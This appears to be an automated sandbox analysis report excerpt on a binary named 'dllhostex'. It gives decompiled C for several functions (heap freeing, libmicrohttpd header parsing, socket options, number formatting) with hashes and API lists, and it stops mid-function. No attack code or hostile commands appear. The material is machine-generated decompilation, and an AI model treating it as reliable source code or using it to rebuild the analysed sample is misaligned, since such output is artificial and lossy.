                                                • Opcode ID: 5d2e645ad0f4b0b9f05e56246cd0ff0457d105eb0295b91751e18cdebab80b9a
                                                • Instruction ID: b331eeb9553264a8f91c1f7de027d25acd7321104e2310af56e8c8d576bb945d
                                                • Opcode Fuzzy Hash: 5d2e645ad0f4b0b9f05e56246cd0ff0457d105eb0295b91751e18cdebab80b9a
                                                • Instruction Fuzzy Hash: 4B41D172E002049FDB24DF7CC980A5DB7BAFF85718F1585A8D519EB389DA31A901CB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0136E308 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0136E308(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x13cc300; // 0x13cc354
					if(_t23 != 0) {
						E013656E2(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x13cc304; // 0x13d50fc
					if(_t24 != 0) {
						E013656E2(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x13cc308; // 0x13d50fc
					if(_t25 != 0) {
						E013656E2(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x13cc330; // 0x13cc358
					if(_t26 != 0) {
						E013656E2(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x13cc334; // 0x13d5100
					if(_t27 != 0) {
						return E013656E2(_t6);
					}
				}
				return _t6;
			}










                                                0x0136e30e
                                                0x0136e313
                                                0x0136e317
                                                0x0136e31d
                                                0x0136e320
                                                0x0136e325
                                                0x0136e329
                                                0x0136e32f
                                                0x0136e332
                                                0x0136e337
                                                0x0136e33b
                                                0x0136e341
                                                0x0136e344
                                                0x0136e349
                                                0x0136e34d
                                                0x0136e353
                                                0x0136e356
                                                0x0136e35b
                                                0x0136e35c
                                                0x0136e35f
                                                0x0136e365
                                                0x00000000
                                                0x0136e36d
                                                0x0136e365
                                                0x0136e370

                                                APIs
                                                • _free.LIBCMT ref: 0136E320
                                                  • Part of subcall function 013656E2: HeapFree.KERNEL32(00000000,00000000,?,01363C72), ref: 013656F8
                                                  • Part of subcall function 013656E2: GetLastError.KERNEL32(?,?,01363C72), ref: 0136570A
                                                • _free.LIBCMT ref: 0136E332
                                                • _free.LIBCMT ref: 0136E344
                                                • _free.LIBCMT ref: 0136E356
                                                • _free.LIBCMT ref: 0136E368
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 75cb491accdde86cc4006e7fc5d3c718474ba4aeafd0c64d9c70ee73918df496
                                                • Instruction ID: 1afd86d5104fe809be30edf9291d2c217e92889030928a22e22a105931ca4bea
                                                • Opcode Fuzzy Hash: 75cb491accdde86cc4006e7fc5d3c718474ba4aeafd0c64d9c70ee73918df496
                                                • Instruction Fuzzy Hash: 96F0FF33545601ABD630EB6DF9C1C1A7BDEAB10768B789829F148D7548CB24FD848764
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0134BCD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WSAPoll.WS2_32(?,00000000,00000001), ref: 0134BD78
                                                • WSAGetLastError.WS2_32 ref: 0134BD82
                                                • recv.WS2_32(?,?,00000004,00000000), ref: 0134BDDF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLastPollrecv
                                                • String ID: poll failed: %s
                                                • API String ID: 4048060239-636620642
                                                • Opcode ID: c8a01a2a743c1ceb126b957c919f94fcfa2cd75737a4b40ec1d283215211862f
                                                • Instruction ID: cff507931fae3e5ed5d311ed33f9b504b0eb63d0597e8911f50a320fe6b8623b
                                                • Opcode Fuzzy Hash: c8a01a2a743c1ceb126b957c919f94fcfa2cd75737a4b40ec1d283215211862f
                                                • Instruction Fuzzy Hash: F13108316007455BF320AF2C98947AABBD4EB8132CF540A6DEAE6C21D5E734E5898762
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0134FF60 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 58%
                                                			E0134FF60(void* __ecx, intOrPtr __edx) {
				intOrPtr _t8;
				intOrPtr _t9;
				void* _t11;
				void* _t12;
				void* _t16;
				intOrPtr _t21;
				char* _t22;
				intOrPtr* _t23;

				_t21 = __edx;
				_t16 = __ecx;
				_t22 = E013551C0(__edx, 0x3a);
				_t8 =  *((intOrPtr*)(_t16 + 0x10));
				if(_t22 != 0) {
					if( *((intOrPtr*)(_t8 + 0xec)) > 0xffffffff) {
						L8:
						 *_t22 = 0;
						_t23 = _t22 + 1;
						_t9 =  *_t23;
						if(_t9 != 0) {
							while(_t9 == 0x20 || _t9 == 9) {
								_t9 =  *((intOrPtr*)(_t23 + 1));
								_t23 = _t23 + 1;
								if(_t9 != 0) {
									continue;
								}
								goto L12;
							}
						}
						L12:
						 *((intOrPtr*)(_t16 + 0x44)) = _t21;
						 *((intOrPtr*)(_t16 + 0x48)) = _t23;
						return 1;
					} else {
						_t11 = E013551C0(_t21, 0x20);
						if(_t11 == 0 || _t11 >= _t22) {
							_t12 = E013551C0(_t21, 9);
							if(_t12 == 0 || _t12 >= _t22) {
								goto L8;
							} else {
								goto L2;
							}
						} else {
							goto L2;
						}
					}
				} else {
					_push("Received malformed line (no colon). Closing connection.\n");
					_push(_t8);
					E01351E90();
					_t2 = _t22 + 1; // 0x1
					E0134DD20(_t16, _t2);
					L2:
					return 0;
				}
			}











                                                0x0134ff63
                                                0x0134ff65
                                                0x0134ff6f
                                                0x0134ff74
                                                0x0134ff79
                                                0x0134ffa0
                                                0x0134ffc8
                                                0x0134ffc8
                                                0x0134ffcb
                                                0x0134ffcc
                                                0x0134ffd0
                                                0x0134ffd2
                                                0x0134ffda
                                                0x0134ffdd
                                                0x0134ffe0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0134ffe0
                                                0x0134ffd2
                                                0x0134ffe2
                                                0x0134ffe2
                                                0x0134ffeb
                                                0x0134fff0
                                                0x0134ffa2
                                                0x0134ffa5
                                                0x0134ffaf
                                                0x0134ffb8
                                                0x0134ffc2
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0134ffaf
                                                0x0134ff7b
                                                0x0134ff7b
                                                0x0134ff80
                                                0x0134ff81
                                                0x0134ff89
                                                0x0134ff8e
                                                0x0134ff95
                                                0x0134ff98
                                                0x0134ff98

                                                APIs
                                                • ___from_strstr_to_strchr.LIBCMT ref: 0134FF6A
                                                • ___from_strstr_to_strchr.LIBCMT ref: 0134FFA5
                                                • ___from_strstr_to_strchr.LIBCMT ref: 0134FFB8
                                                  • Part of subcall function 0134DD20: shutdown.WS2_32(?,00000001), ref: 0134DD56
                                                Strings
                                                • Received malformed line (no colon). Closing connection., xrefs: 0134FF7B
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ___from_strstr_to_strchr$shutdown
                                                • String ID: Received malformed line (no colon). Closing connection.
                                                • API String ID: 899474339-3301224655
                                                • Opcode ID: 3638054064c09008f2e54a51a2e7a3c020f4b1a288bed102ee4e1342e58717d1
                                                • Instruction ID: 0c84185c53aaf66265713a301c654d22295c06d8756b5a04d713a9670a97f3a5
                                                • Opcode Fuzzy Hash: 3638054064c09008f2e54a51a2e7a3c020f4b1a288bed102ee4e1342e58717d1
                                                • Instruction Fuzzy Hash: DC01D621A003110BEF32596C5C81F6D6BDD9F63B6EF1C086AED94DA282F251B44A86E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0134DB50 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 40COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 33%
                                                			E0134DB50(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr _v0;
				char _v4;
				char _v8;
				intOrPtr _t30;
				intOrPtr* _t35;
				signed int _t38;
				signed int _t41;
				intOrPtr _t45;
				void* _t49;
				intOrPtr* _t50;
				intOrPtr* _t53;
				intOrPtr _t56;
				void* _t57;
				intOrPtr _t59;
				void* _t64;

				_t56 = __edx;
				_t49 = __ecx;
				_push(__ecx);
				_v4 = 1;
				if(__ecx == 0) {
					_push("NULL != connection");
					_push(0x234);
					E012938B0(__ecx, E0135B8FA(2), "%s:%u Assertion failed: %s\nProgram aborted.\n", "c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\connection.c");
					E0135D32E(_t49, E0135B8FA(2));
					E0135EBB9(__ebx, _t49, _t56, __edi, __esi);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t49);
					_v8 = 0;
					if(_t49 == 0) {
						_push("NULL != connection");
						_push(0x286);
						E012938B0(_t49, E0135B8FA(2), "%s:%u Assertion failed: %s\nProgram aborted.\n", "c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\connection.c");
						E0135D32E(_t49, E0135B8FA(2));
						E0135EBB9(__ebx, _t49, _t56, __edi, __esi);
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(__ebx);
						_push(__esi);
						_t64 = _t49;
						_t45 = _t56;
						_push(__edi);
						_t50 =  *((intOrPtr*)(_t64 + 0x20));
						_t30 =  *((intOrPtr*)(_t50 + 8));
						_t59 =  *((intOrPtr*)(_t50 + 0xc));
						_t57 = _t30 + 0x10;
						if(_t57 > _t59 || _t57 < _t30) {
							L12:
							return 0;
						} else {
							 *((intOrPtr*)(_t50 + 0xc)) = _t59 - 0x10;
							_t53 =  *_t50 + 0xfffffff0 + _t59;
							if(_t53 == 0) {
								goto L12;
							} else {
								 *((intOrPtr*)(_t53 + 4)) = _v4;
								 *((intOrPtr*)(_t53 + 8)) = _v0;
								 *((intOrPtr*)(_t53 + 0xc)) = _t45;
								 *_t53 = 0;
								_t35 =  *((intOrPtr*)(_t64 + 0x18));
								if(_t35 != 0) {
									 *_t35 = _t53;
									 *((intOrPtr*)(_t64 + 0x18)) = _t53;
									return 1;
								} else {
									 *((intOrPtr*)(_t64 + 0x14)) = _t53;
									 *((intOrPtr*)(_t64 + 0x18)) = _t53;
									return 1;
								}
							}
						}
					} else {
						_t38 =  &_v8;
						__imp__#21( *((intOrPtr*)(_t49 + 0xa0)), 6, 1, _t38, 4);
						asm("sbb eax, eax");
						return  ~_t38 + 1;
					}
				} else {
					_t41 =  &_v4;
					__imp__#21( *((intOrPtr*)(__ecx + 0xa0)), 6, 1, _t41, 4);
					asm("sbb eax, eax");
					return  ~_t41 + 1;
				}
			}


















                                                0x0134db50
                                                0x0134db50
                                                0x0134db50
                                                0x0134db51
                                                0x0134db5a
                                                0x0134db7a
                                                0x0134db7f
                                                0x0134db99
                                                0x0134dbac
                                                0x0134dbb4
                                                0x0134dbb9
                                                0x0134dbba
                                                0x0134dbbb
                                                0x0134dbbc
                                                0x0134dbbd
                                                0x0134dbbe
                                                0x0134dbbf
                                                0x0134dbc0
                                                0x0134dbc1
                                                0x0134dbca
                                                0x0134dbea
                                                0x0134dbef
                                                0x0134dc09
                                                0x0134dc1c
                                                0x0134dc24
                                                0x0134dc29
                                                0x0134dc2a
                                                0x0134dc2b
                                                0x0134dc2c
                                                0x0134dc2d
                                                0x0134dc2e
                                                0x0134dc2f
                                                0x0134dc30
                                                0x0134dc31
                                                0x0134dc32
                                                0x0134dc34
                                                0x0134dc36
                                                0x0134dc37
                                                0x0134dc3a
                                                0x0134dc3d
                                                0x0134dc40
                                                0x0134dc45
                                                0x0134dc95
                                                0x0134dc9a
                                                0x0134dc4b
                                                0x0134dc4e
                                                0x0134dc56
                                                0x0134dc58
                                                0x00000000
                                                0x0134dc5a
                                                0x0134dc5e
                                                0x0134dc65
                                                0x0134dc68
                                                0x0134dc6b
                                                0x0134dc71
                                                0x0134dc76
                                                0x0134dc87
                                                0x0134dc8f
                                                0x0134dc94
                                                0x0134dc78
                                                0x0134dc78
                                                0x0134dc81
                                                0x0134dc86
                                                0x0134dc86
                                                0x0134dc76
                                                0x0134dc58
                                                0x0134dbcc
                                                0x0134dbce
                                                0x0134dbdd
                                                0x0134dbe5
                                                0x0134dbe9
                                                0x0134dbe9
                                                0x0134db5c
                                                0x0134db5e
                                                0x0134db6d
                                                0x0134db75
                                                0x0134db79
                                                0x0134db79

                                                APIs
                                                • setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 0134DB6D
                                                Strings
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\connection.c, xrefs: 0134DB84
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134DB89
                                                • NULL != connection, xrefs: 0134DB7A
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: setsockopt
                                                • String ID: %s:%u Assertion failed: %sProgram aborted.$NULL != connection$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\connection.c
                                                • API String ID: 3981526788-467287981
                                                • Opcode ID: 8d8078255a3de16593d962ab675f8f96149fe22dce23e2ddb23ad08fbb363707
                                                • Instruction ID: 353a29b74dcbfd1307b8123c6f2032f9a9582cf2d4e5add0506e0d86a3e33d2e
                                                • Opcode Fuzzy Hash: 8d8078255a3de16593d962ab675f8f96149fe22dce23e2ddb23ad08fbb363707
                                                • Instruction Fuzzy Hash: 4CF0E5F2BD43023AFA1436796C07F27756D9B20F0DF04087CFA0BA42C5E6B291184123
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0134DBC0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 40COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 43%
                                                			E0134DBC0(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v0;
				char _v4;
				intOrPtr _t23;
				intOrPtr* _t28;
				signed int _t31;
				intOrPtr _t35;
				void* _t39;
				intOrPtr* _t40;
				intOrPtr* _t43;
				intOrPtr _t45;
				void* _t46;
				intOrPtr _t48;
				void* _t53;

				_t45 = __edx;
				_t39 = __ecx;
				_push(__ecx);
				_v4 = 0;
				if(__ecx == 0) {
					_push("NULL != connection");
					_push(0x286);
					E012938B0(__ecx, E0135B8FA(2), "%s:%u Assertion failed: %s\nProgram aborted.\n", "c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\connection.c");
					E0135D32E(_t39, E0135B8FA(2));
					E0135EBB9(__ebx, _t39, _t45, __edi, __esi);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(__ebx);
					_push(__esi);
					_t53 = _t39;
					_t35 = _t45;
					_push(__edi);
					_t40 =  *((intOrPtr*)(_t53 + 0x20));
					_t23 =  *((intOrPtr*)(_t40 + 8));
					_t48 =  *((intOrPtr*)(_t40 + 0xc));
					_t46 = _t23 + 0x10;
					if(_t46 > _t48 || _t46 < _t23) {
						L9:
						return 0;
					} else {
						 *((intOrPtr*)(_t40 + 0xc)) = _t48 - 0x10;
						_t43 =  *_t40 + 0xfffffff0 + _t48;
						if(_t43 == 0) {
							goto L9;
						} else {
							 *((intOrPtr*)(_t43 + 4)) = _v0;
							 *((intOrPtr*)(_t43 + 8)) = _a4;
							 *((intOrPtr*)(_t43 + 0xc)) = _t35;
							 *_t43 = 0;
							_t28 =  *((intOrPtr*)(_t53 + 0x18));
							if(_t28 != 0) {
								 *_t28 = _t43;
								 *((intOrPtr*)(_t53 + 0x18)) = _t43;
								return 1;
							} else {
								 *((intOrPtr*)(_t53 + 0x14)) = _t43;
								 *((intOrPtr*)(_t53 + 0x18)) = _t43;
								return 1;
							}
						}
					}
				} else {
					_t31 =  &_v4;
					__imp__#21( *((intOrPtr*)(__ecx + 0xa0)), 6, 1, _t31, 4);
					asm("sbb eax, eax");
					return  ~_t31 + 1;
				}
			}
















                                                0x0134dbc0
                                                0x0134dbc0
                                                0x0134dbc0
                                                0x0134dbc1
                                                0x0134dbca
                                                0x0134dbea
                                                0x0134dbef
                                                0x0134dc09
                                                0x0134dc1c
                                                0x0134dc24
                                                0x0134dc29
                                                0x0134dc2a
                                                0x0134dc2b
                                                0x0134dc2c
                                                0x0134dc2d
                                                0x0134dc2e
                                                0x0134dc2f
                                                0x0134dc30
                                                0x0134dc31
                                                0x0134dc32
                                                0x0134dc34
                                                0x0134dc36
                                                0x0134dc37
                                                0x0134dc3a
                                                0x0134dc3d
                                                0x0134dc40
                                                0x0134dc45
                                                0x0134dc95
                                                0x0134dc9a
                                                0x0134dc4b
                                                0x0134dc4e
                                                0x0134dc56
                                                0x0134dc58
                                                0x00000000
                                                0x0134dc5a
                                                0x0134dc5e
                                                0x0134dc65
                                                0x0134dc68
                                                0x0134dc6b
                                                0x0134dc71
                                                0x0134dc76
                                                0x0134dc87
                                                0x0134dc8f
                                                0x0134dc94
                                                0x0134dc78
                                                0x0134dc78
                                                0x0134dc81
                                                0x0134dc86
                                                0x0134dc86
                                                0x0134dc76
                                                0x0134dc58
                                                0x0134dbcc
                                                0x0134dbce
                                                0x0134dbdd
                                                0x0134dbe5
                                                0x0134dbe9
                                                0x0134dbe9

                                                APIs
                                                • setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 0134DBDD
                                                Strings
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\connection.c, xrefs: 0134DBF4
                                                • NULL != connection, xrefs: 0134DBEA
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134DBF9
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: setsockopt
                                                • String ID: %s:%u Assertion failed: %sProgram aborted.$NULL != connection$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\connection.c
                                                • API String ID: 3981526788-467287981
                                                • Opcode ID: 2a8da69ea243c654a80544d4e6707ba0a4a7c95e23edebb9e6cc88db22b94f0e
                                                • Instruction ID: 862fbe7e9427be0459c6bce51f08e0b169dba14ea1a6a227491a999de21f70f1
                                                • Opcode Fuzzy Hash: 2a8da69ea243c654a80544d4e6707ba0a4a7c95e23edebb9e6cc88db22b94f0e
                                                • Instruction Fuzzy Hash: F8F065F2F993013AF6183679AC0BF67655D5F20F0DF1409BCFA4BA51C5E6A1A1184163
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01366022 Relevance: 6.3, APIs: 4, Instructions: 317COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 78%
                                                			E01366022(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v32;
				signed int _v40;
				char _v48;
				intOrPtr _v56;
				char _v60;
				void* __ebx;
				void* __edi;
				signed char _t84;
				void* _t90;
				signed int _t94;
				signed int _t96;
				signed int _t97;
				signed int _t98;
				signed int _t103;
				signed int _t104;
				void* _t105;
				signed int _t106;
				void* _t107;
				void* _t109;
				void* _t112;
				void* _t114;
				void* _t118;
				char* _t119;
				signed short _t122;
				void* _t123;
				signed int _t124;
				signed short _t127;
				signed int _t132;
				signed int* _t133;
				signed int* _t136;
				signed int _t137;
				signed int _t141;
				signed int _t143;
				signed int _t148;
				signed int _t149;
				signed int _t153;
				signed short _t159;
				unsigned int _t160;
				signed int _t167;
				void* _t168;
				signed int _t169;
				signed int* _t170;
				signed int _t173;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t168 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t185 = _a8;
				 *_t185 = 0;
				E01359186( &_v60, _t168, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t136 = _a4;
					_t141 = _t136[1];
					_t169 =  *_t136;
					__eflags = (_t141 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t141 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						__eflags = _t141;
						if(__eflags > 0) {
							L14:
							_t170 = _t185 + 1;
							_t84 = _a28 ^ 0x00000001;
							_v20 = 0x3ff;
							_v5 = _t84;
							_v40 = _t170;
							_v32 = ((_t84 & 0x000000ff) << 5) + 7;
							__eflags = _t141 & 0x7ff00000;
							_t90 = 0x30;
							if((_t141 & 0x7ff00000) != 0) {
								 *_t185 = 0x31;
								L19:
								_t143 = 0;
								__eflags = 0;
								L20:
								_t186 =  &(_t170[0]);
								_v16 = _t186;
								__eflags = _t181;
								if(_t181 != 0) {
									_t94 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v56 + 0x88))))));
								} else {
									_t94 = _t143;
								}
								 *_t170 = _t94;
								_t96 = _t136[1] & 0x000fffff;
								__eflags = _t96;
								_v24 = _t96;
								if(_t96 > 0) {
									L25:
									_t171 = _t143;
									_t144 = 0xf0000;
									_t97 = 0x30;
									_v12 = _t97;
									_v16 = _t143;
									_v24 = 0xf0000;
									do {
										__eflags = _t181;
										if(_t181 <= 0) {
											break;
										}
										_t122 = E01374310( *_t136 & _t171, _v12, _t136[1] & _t144 & 0x000fffff);
										_t123 = 0x30;
										_t159 = (_t122 & 0x0000ffff) + _t123;
										_t124 = _t159 & 0x0000ffff;
										__eflags = _t159 - 0x39;
										if(_t159 > 0x39) {
											_t127 = _v32 + _t159;
											__eflags = _t127;
											_t124 = _t127 & 0x0000ffff;
										}
										_t160 = _v24;
										_t171 = (_t160 << 0x00000020 | _v16) >> 4;
										 *_t186 = _t124;
										_t186 = _t186 + 1;
										_t144 = _t160 >> 4;
										_t97 = _v12 - 4;
										_t181 = _t181 - 1;
										_v16 = (_t160 << 0x00000020 | _v16) >> 4;
										_v24 = _t160 >> 4;
										_v12 = _t97;
										__eflags = _t97;
									} while (_t97 >= 0);
									_v16 = _t186;
									__eflags = _t97;
									if(_t97 < 0) {
										goto L41;
									}
									_t118 = E01374310( *_t136 & _t171, _v12, _t136[1] & _t144 & 0x000fffff);
									__eflags = _t118 - 8;
									if(_t118 <= 8) {
										goto L41;
									}
									_t119 = _t186 - 1;
									while(1) {
										_t153 =  *_t119;
										__eflags = _t153 - 0x66;
										if(_t153 == 0x66) {
											goto L35;
										}
										__eflags = _t153 - 0x46;
										if(_t153 != 0x46) {
											__eflags = _t119 - _v40;
											if(_t119 == _v40) {
												_t53 = _t119 - 1;
												 *_t53 =  *(_t119 - 1) + 1;
												__eflags =  *_t53;
											} else {
												__eflags = _t153 - 0x39;
												if(_t153 == 0x39) {
													_t153 = _v32 + 0x39;
													__eflags = _t153;
												}
												 *_t119 = _t153 + 1;
											}
											goto L41;
										}
										L35:
										 *_t119 = 0x30;
										_t119 = _t119 - 1;
									}
								} else {
									__eflags =  *_t136 - _t143;
									if( *_t136 <= _t143) {
										L41:
										__eflags = _t181;
										if(_t181 > 0) {
											_push(_t181);
											_t114 = 0x30;
											_push(_t114);
											_push(_t186);
											E01356150(_t181);
											_t186 = _t186 + _t181;
											__eflags = _t186;
											_v16 = _t186;
										}
										_t98 = _v40;
										__eflags =  *_t98;
										if( *_t98 == 0) {
											_t186 = _t98;
											_v16 = _t186;
										}
										 *_t186 = (_v5 << 5) + 0x50;
										_t103 = E01374310( *_t136, 0x34, _t136[1]);
										_t187 = 0;
										_t104 = _v16;
										_t148 = (_t103 & 0x000007ff) - _v20;
										__eflags = _t148;
										asm("sbb esi, esi");
										_t173 = _t104 + 2;
										_v40 = _t173;
										if(__eflags < 0) {
											L49:
											_t148 =  ~_t148;
											asm("adc esi, 0x0");
											_t187 =  ~_t187;
											_t137 = 0x2d;
											goto L50;
										} else {
											if(__eflags > 0) {
												L48:
												_t137 = 0x2b;
												L50:
												 *(_t104 + 1) = _t137;
												_t182 = _t173;
												_t105 = 0x30;
												 *_t173 = _t105;
												_t106 = 0;
												__eflags = _t187;
												if(__eflags < 0) {
													L54:
													__eflags = _t182 - _t173;
													if(_t182 != _t173) {
														L58:
														_push(_t137);
														_push(_t106);
														_push(0x64);
														_push(_t187);
														_t107 = E01374040();
														_t187 = _t137;
														_t137 = _t148;
														_v32 = _t173;
														_t173 = _v40;
														 *_t182 = _t107 + 0x30;
														_t182 = _t182 + 1;
														_t106 = 0;
														__eflags = 0;
														L59:
														__eflags = _t182 - _t173;
														if(_t182 != _t173) {
															L63:
															_push(_t137);
															_push(_t106);
															_push(0xa);
															_push(_t187);
															_push(_t148);
															_t109 = E01374040();
															_v40 = _t173;
															 *_t182 = _t109 + 0x30;
															_t182 = _t182 + 1;
															_t106 = 0;
															__eflags = 0;
															L64:
															_t149 = _t148 + 0x30;
															__eflags = _t149;
															 *_t182 = _t149;
															 *(_t182 + 1) = _t106;
															_t183 = _t106;
															L65:
															if(_v48 != 0) {
